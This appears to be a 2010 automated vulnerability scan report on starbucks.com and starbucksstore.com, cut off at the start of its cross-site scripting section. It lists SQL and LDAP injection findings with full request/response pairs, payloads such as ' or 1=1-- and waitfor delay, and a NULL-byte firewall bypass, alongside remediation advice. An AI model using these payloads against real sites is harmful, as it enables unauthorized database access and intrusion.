SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Issue remediation
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
1.1. http://www.starbucks.com/coffee/starbucks-reserve-coffee [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.starbucks.com
Path:
/coffee/starbucks-reserve-coffee
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 62476475'%20or%201%3d1--%20 and 62476475'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /coffee/starbucks-reserve-coffee?162476475'%20or%201%3d1--%20=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response 1
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:57:35 GMT Connection: close Content-Length: 52660
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]... <a href="/coffee/starbucks-reserve-coffee/aged-sulawesi-kalosi" title="Aged Sulawesi Kalosi"> <img src="http://assets.starbucks.com/assets/aa98bb468e8e4d11bcf9c7c5c337e4fd.jpg" alt="Aged Sulawesi Kalosi Stamp Art" /> <br /><strong><span>Aged Sulawesi Kalosi</span></strong> <br /><span class="family">Starbucks Reserve... Coffee </span> <br /><span class="intensity"></span> </a> </li>
<li class="specialty_roast"> <a href="/coffee/starbucks-reserve-coffee/brazil-sul-de-minas-peaberry" title="Brazil Sul de Minas Peaberry"> <img src="http://assets.starbucks.com/assets/84a1915283354bf5af4293a62a6b3175.jpg" alt="Brazil Sul de Minas Peaberry Stamp Art" /> <br /><strong><span>Brazil Sul de Minas Peaberry</span></strong> <br /><span class="family">Starbucks Reserve... Coffee </span> <br /><span class="intensity"></span> </a> </li>
1.2. http://www.starbucks.com/coffee/via/instant-coffee [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.starbucks.com
Path:
/coffee/via/instant-coffee
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 13312046'%20or%201%3d1--%20 and 13312046'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /coffee/via/instant-coffee?113312046'%20or%201%3d1--%20=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response 1
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:57:02 GMT Connection: close Content-Length: 53520
<li class="specialty_roast"> <a href="/coffee/via/instant-coffee/decaf-italian-roast" title="Decaf Italian Roast"> <img src="http://assets.starbucks.com/assets/fe84dd520a6145e0a7a83ab844737097.png" alt="Information about Starbucks VIA.. Dec ...[SNIP]...
Request 2
GET /coffee/via/instant-coffee?113312046'%20or%201%3d2--%20=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response 2
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:57:02 GMT Connection: close Content-Length: 53065
<li class="specialty_roast"> <a href="/coffee/via/instant-coffee/decaf-italian-roast" title="Decaf Italian Roast"> <img src="http://assets.starbucks.com/assets/fe84dd520a6145e0a7a83ab844737097.png" alt="Information about Starbucks VIA.. Decaf Italian Roast" /> <br /><strong><span>Decaf Italian Roast</span></strong> <br /><span class="family">Starbucks VIA.. Coffees</span> <br /><span class="intensity"></span> </a> </li>
</ol> </div>
<div class="section" id="posts">
<div id="blog-602" class="blog-entry"> <h2><a href="/blog/Perfect-your-Starbucks-VIA-Ready-Brew-Flavored-experience">Perfect Your Starbucks VI ...[SNIP]...
1.3. http://www.starbucks.com/menu [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.starbucks.com
Path:
/menu
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /menu?1'%20and%201%3d1--%20=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response 1
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 19:38:03 GMT Connection: close Content-Length: 72340
The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /responsibility HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883%00'; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response 1
HTTP/1.1 302 Found Cache-Control: private Content-Type: text/html; charset=utf-8 Location: /error/ Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 20:14:43 GMT Connection: close Content-Length: 128
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2ferror%2f">here</a>.</h2> </body></html>
Request 2
GET /responsibility HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883%00''; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response 2
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 20:15:59 GMT Connection: close Content-Length: 56642
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]...
The __utmc cookie appears to be vulnerable to SQL injection attacks. The payload ')waitfor%20delay'0%3a0%3a20'-- was submitted in the __utmc cookie. The application took 51339 milliseconds to respond to the request, compared with 260 milliseconds for the original request, indicating that the injected SQL command caused a time delay.
The database appears to be Microsoft SQL Server.
Request
GET /responsibility/community/starbucks-foundation HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883')waitfor%20delay'0%3a0%3a20'--; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 20:42:07 GMT Connection: close Content-Length: 39480
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/s ...[SNIP]...
The SITESERVER cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the SITESERVER cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /aff/adredir.asp?CCAID=SBPTPAHP1SHCO&Redir=%2Fcoffee%2F HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C'; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response 1
HTTP/1.1 500 Internal Server Error Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:30:25 GMT Connection: close Content-Length: 75
The page cannot be displayed because an internal server error has occurred.
Request 2
GET /aff/adredir.asp?CCAID=SBPTPAHP1SHCO&Redir=%2Fcoffee%2F HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C''; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response 2
HTTP/1.1 302 Object moved Cache-Control: private Content-Length: 168 Content-Type: text/html Location: /coffee/?CCAID=SBPTPAHP1SHCO&Redir=/coffee/ Server: Microsoft-IIS/7.0 Set-Cookie: CookingAd=CCREF=&CCADATE=20101116&CCAID=SBPTPAHP1SHCO; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/ X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:30:26 GMT Connection: close
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/coffee/?CCAID=SBPTPAHP1SHCO&Redir=/coffee/">here</a>.</body>
The ASPSESSIONIDACABBACA cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the ASPSESSIONIDACABBACA cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
<title>Contact Us - StarbucksStore.com</title> <script language="JavaScript1.2" type="text/javascript"><!-- function CheckInput(form) { var passed = true; if (form.cboSubjects){ if (form.cboSubjects.selectedIndex==0){ alert("Please select a subject and topic for your email."); passed = false; } } return passed; }
<!-- SiteCatalyst code version: G.6.Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com --><script language="JavaScript"><!--/* You may give each page an identifying name, server, and channel onthe next lines. */ var s_pageName="/guestassist/shcontus.asp" var s_setRef="" var s_server="10.11.5.101" var s_channel="" var s_pageType="" var s_prop1="" var s_prop2="/guestassist/shcontus.asp" var s_prop3="SBPTPAHP1SHTB" var s_prop4="" var s_prop5="" var s_prop6="/guestassist/shcontus.asp?error=noselection" var s_prop7="" var s_prop8="" var s_prop9="" var s_prop10="" /* E-commerce Variables */ var s_campaign="" var s_state="" var s_zip="" var s_events="" var s_products="" var s_purchaseID="" var s_eVar1="" var s_eVar2="" var s_eVar3="" var s_eVar4="" var s_eVar5="" var s_eVar6="" var s_eVar7="" var s_eVar8="" var s_eVar9="" var s_eVar10=""
2. LDAP injection
There are 4 instances of this issue:
LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.
Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Issue remediation
If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.
The ASPSESSIONIDACABBACA cookie appears to be vulnerable to LDAP injection attacks.
The payloads b04135e4d2d6b331)(sn=* and b04135e4d2d6b331)!(sn=* were each submitted in the ASPSESSIONIDACABBACA cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET / HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=b04135e4d2d6b331)(sn=*; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response 1
HTTP/1.1 200 OK Cache-Control: private Content-Length: 21174 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:36:30 GMT Connection: close
<!--S1--><!--S0--> <link href="/include/sitenew.css" type="text/css" rel="StyleSheet"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name="description" content="Find every Starbucks Coffee at the Official Online Store."> <meta name="keywords" content="Coffee, Starbucks Coffee, whole bean coffee, ground coffee, decaffeinated coffee, instant coffee, VIA,Tazo tea">
<script src="/include/LibJavaScript.js" type="text/javascript"></script> <title> Starbucks Coffee - Coffee Beans, Espresso Pods, VIA, and House Blend at Starbucks Store </title>
Request 2
GET / HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=b04135e4d2d6b331)!(sn=*; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response 2
HTTP/1.1 200 OK Cache-Control: private Content-Length: 21174 Content-Type: text/html Server: Microsoft-IIS/7.0 Set-Cookie: ASPSESSIONIDACABBACA=HOJMDLCBHPPELAMPENAAECCJ; path=/ X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:36:30 GMT Connection: close
<!--S1--><!--S0--> <link href="/include/sitenew.css" type="text/css" rel="StyleSheet"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name="description" content="Find every Starbucks Coffee at the Official Online Store."> <meta name="keywords" content="Coffee, Starbucks Coffee, whole bean coffee, ground coffee, decaffeinated coffee, instant coffee, VIA,Tazo tea">
<script src="/include/LibJavaScript.js" type="text/javascript"></script> <title> Starbucks Coffee - Coffee Beans, Espresso Pods, VIA, and House Blend at Starbucks Store </title>
The ASPSESSIONIDACABBACA cookie appears to be vulnerable to LDAP injection attacks.
The payloads 1a18fdd9ce30786c)(sn=* and 1a18fdd9ce30786c)!(sn=* were each submitted in the ASPSESSIONIDACABBACA cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET /aff/adredir.asp?CCAID=SBPTPAHP1SHTUM&Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0035%26SubClassNo%3D0262%26cpnum%3DDRINKWARE HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=1a18fdd9ce30786c)(sn=*; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response 1
HTTP/1.1 302 Object moved Cache-Control: private Content-Length: 351 Content-Type: text/html Location: /products/shprodli.asp?DeptNo=8100&ClassNo=0035&SubClassNo=0262&cpnum=DRINKWARE&CCAID=SBPTPAHP1SHTUM&Redir=/products/shprodli.asp?DeptNo=8100&ClassNo=0035&SubClassNo=0262&cpnum=DRINKWARE Server: Microsoft-IIS/7.0 Set-Cookie: CookingAd=CCREF=&CCADATE=20101116&CCAID=SBPTPAHP1SHTUM; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/ Set-Cookie: ASPSESSIONIDACABBACA=HCKMDLCBEBEEIOJHOPIJIEII; path=/ X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:36:39 GMT Connection: close
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/products/shprodli.asp?DeptNo=8100&ClassNo=0035&SubClassNo=0262&cpnum=DRINKWARE&CCAID=SBPTPAHP1SHTUM&Redir=/products/shprodli.asp?DeptNo=8100&amp;ClassNo=0035&amp;SubClassNo=0262&amp;cpnum=DRINKWARE">here</a>.</body>
Request 2
GET /aff/adredir.asp?CCAID=SBPTPAHP1SHTUM&Redir=%2Fproducts%2Fshprodli%2Easp%3FDeptNo%3D8100%26ClassNo%3D0035%26SubClassNo%3D0262%26cpnum%3DDRINKWARE HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=1a18fdd9ce30786c)!(sn=*; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response 2
HTTP/1.1 302 Object moved Cache-Control: private Content-Length: 351 Content-Type: text/html Location: /products/shprodli.asp?DeptNo=8100&ClassNo=0035&SubClassNo=0262&cpnum=DRINKWARE&CCAID=SBPTPAHP1SHTUM&Redir=/products/shprodli.asp?DeptNo=8100&ClassNo=0035&SubClassNo=0262&cpnum=DRINKWARE Server: Microsoft-IIS/7.0 Set-Cookie: CookingAd=CCREF=&CCADATE=20101116&CCAID=SBPTPAHP1SHTUM; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/ X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:36:39 GMT Connection: close
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/products/shprodli.asp?DeptNo=8100&ClassNo=0035&SubClassNo=0262&cpnum=DRINKWARE&CCAID=SBPTPAHP1SHTUM&Redir=/products/shprodli.asp?DeptNo=8100&amp;ClassNo=0035&amp;SubClassNo=0262&amp;cpnum=DRINKWARE">here</a>.</body>
The ASPSESSIONIDCCDDADAA cookie appears to be vulnerable to LDAP injection attacks.
The payloads c20c2704323c6dbe)(sn=* and c20c2704323c6dbe)!(sn=* were each submitted in the ASPSESSIONIDCCDDADAA cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.
Request 1
GET /coffee-machines/?CCAID=SBPTPAHPODEA HTTP/1.1 Host: www.starbucksstore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=c20c2704323c6dbe)(sn=*; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;
Response 1
HTTP/1.1 200 OK Cache-Control: private Content-Length: 21102 Content-Type: text/html Server: Microsoft-IIS/7.0 Set-Cookie: CookingAd=CCADATE=20101116&CCAID=SBPTPAHPODEA; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/ Set-Cookie: ASPSESSIONIDCCDDADAA=GJHKDLCBKFNCFHEOPBDCFKDD; path=/ X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 18:36:35 GMT Connection: close
<!--S1--><!--S0-->
<html> <head> <link REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css"> <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1"> <meta name="description" content="Shop for Coffee Machines, Espresso Machines and more at Starbucks Store"> <meta name="keywords" content="coffee machines, espresso machines">
<script src="/include/LibJavaScript.js" type="text/javascript"></script> <title>Coffee Machines at Starbucks Store</title>
The EMail.x parameter appears to be vulnerable to LDAP injection attacks.
The payloads *)(sn=* and *)!(sn=* were each submitted in the EMail.x parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.
HTTP/1.1 302 Object moved Cache-Control: private Content-Length: 164 Content-Type: text/html Location: /guestassist/shcontus.asp?error=noselection Server: Microsoft-IIS/7.0 Set-Cookie: ASPSESSIONIDSAADCCCB=MPCAELCBIKHIIOECBLPILHFA; path=/ X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 20:24:51 GMT
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/guestassist/shcontus.asp?error=noselection">here</a>.</body>
HTTP/1.1 302 Object moved Cache-Control: private Content-Length: 164 Content-Type: text/html Location: /guestassist/shcontus.asp?error=noselection Server: Microsoft-IIS/7.0 Set-Cookie: ASPSESSIONIDSCDCCADA=EODAELCBBDPKJGHJDMNGKJDP; path=/ X-Powered-By: ASP.NET Date: Tue, 16 Nov 2010 20:24:52 GMT
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/guestassist/shcontus.asp?error=noselection">here</a>.</body>
3. Cross-site scripting (reflected)
There are 108 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
